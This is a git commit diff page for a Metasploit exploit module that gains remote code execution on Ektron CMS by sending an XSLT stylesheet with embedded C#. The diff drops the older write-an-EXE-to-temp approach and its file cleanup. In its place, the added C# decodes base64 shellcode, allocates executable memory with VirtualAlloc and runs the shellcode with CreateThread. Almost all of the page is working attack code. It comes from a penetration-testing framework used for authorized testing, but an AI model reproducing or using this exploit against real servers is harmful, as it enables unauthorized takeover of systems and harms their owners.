Merge branch 'ektron_xslt_exec_nicob' of git://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-ektron_xslt_exec_nicob
sinn3r
commit
ceb6f81165
|
|
@ -13,7 +13,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
|
@ -27,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => [
|
||||
'Rich Lundeen', # Vulnerability discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
'juan vazquez', # Metasploit module
|
||||
'Nicolas "Nicob" Gregoire' # C# code using VirtualAlloc + copy shellcode + CreateThread
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
|
@ -102,35 +102,6 @@ return "#{fingerprint}";
|
|||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
begin
|
||||
windir = session.fs.file.expand_path("%WINDIR%")
|
||||
win_file = "#{windir}\\Temp\\#{win_file}"
|
||||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
# read-only flag with a command.
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
session.fs.file.rm(win_file)
|
||||
print_good("Deleted #{file}")
|
||||
true
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def uri_path
|
||||
uri_path = target_uri.path
|
||||
uri_path << "/" if uri_path[-1, 1] != "/"
|
||||
|
|
@ -154,10 +125,8 @@ return "#{fingerprint}";
|
|||
def exploit
|
||||
|
||||
print_status("Generating the EXE Payload and the XSLT...")
|
||||
exe_data = generate_payload_exe
|
||||
exe_string = Rex::Text.to_hex(exe_data)
|
||||
exename = rand_text_alpha(5 + rand(5))
|
||||
fingerprint = rand_text_alpha(5 + rand(5))
|
||||
|
||||
xslt_data = <<-XSLT
|
||||
<?xml version='1.0'?>
|
||||
<xsl:stylesheet version="1.0"
|
||||
|
|
@ -166,23 +135,26 @@ xmlns:msxsl="urn:schemas-microsoft-com:xslt"
|
|||
xmlns:user="http://mycompany.com/mynamespace">
|
||||
<msxsl:script language="C#" implements-prefix="user">
|
||||
<![CDATA[
|
||||
|
||||
private static UInt32 MEM_COMMIT = 0x1000;
|
||||
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
|
||||
|
||||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
|
||||
|
||||
public string xml()
|
||||
{
|
||||
char[] charData = "#{exe_string}".ToCharArray();
|
||||
string fileName = @"C:\\windows\\temp\\#{exename}.txt";
|
||||
System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);
|
||||
System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);
|
||||
for (int i = 0; i < charData.Length; i++)
|
||||
{
|
||||
bw.Write( (byte) charData[i]);
|
||||
}
|
||||
bw.Close();
|
||||
fs.Close();
|
||||
System.Diagnostics.Process p = new System.Diagnostics.Process();
|
||||
p.StartInfo.UseShellExecute = false;
|
||||
p.StartInfo.RedirectStandardOutput = true;
|
||||
p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";
|
||||
p.Start();
|
||||
string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";
|
||||
byte[] shellcode = System.Convert.FromBase64String(shellcode64);
|
||||
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
|
||||
IntPtr hThread = IntPtr.Zero;
|
||||
IntPtr pinfo = IntPtr.Zero;
|
||||
UInt32 threadId = 0;
|
||||
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
|
||||
return "#{fingerprint}";
|
||||
}
|
||||
]]>
|
||||
|
|
@ -210,7 +182,6 @@ return "#{fingerprint}";
|
|||
})
|
||||
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
|
||||
print_good("Exploitation was successful")
|
||||
register_file_for_cleanup("#{exename}.txt")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue